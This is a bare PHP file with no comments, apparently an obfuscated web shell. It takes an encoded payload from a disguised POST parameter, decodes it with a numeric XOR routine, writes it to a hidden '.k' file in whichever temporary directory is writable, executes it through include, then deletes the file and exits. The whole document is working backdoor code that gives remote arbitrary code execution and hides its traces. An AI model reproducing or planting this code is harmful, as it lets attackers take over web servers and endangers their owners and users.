<?php

if(isset($_POST["ent\x69ty"]) ? true : false){
	$elem = $_POST["ent\x69ty"];
	$elem  =	explode  ( 	'.',	$elem ); 
	$dat = '';
            $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	$s4);
            $w = 0;
    
            $__tmp = $elem;
            while(	$v1 = array_shift(	$__tmp)) {
                $sChar = ord(	$s4[$w % $sLen]);
                $dec =(	(	int)$v1 - $sChar -(	$w % 10))		^	91;
                $dat .= chr(	$dec);
                $w++;}  
	$ent = array_filter(["/tmp", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), "/var/tmp"]);
	$bind = 0;
do {
    $itm = $ent[$bind] ?? null;
    if ($bind >= count($ent)) break;
    		if (array_product([is_dir($itm), is_writable($itm)])) {
    $symbol = join("/", [$itm, ".k"]);
    if (file_put_contents($symbol, $dat)) {
	include $symbol;
	@unlink($symbol);
	die();
}
}
    $bind++;
} while (true);
}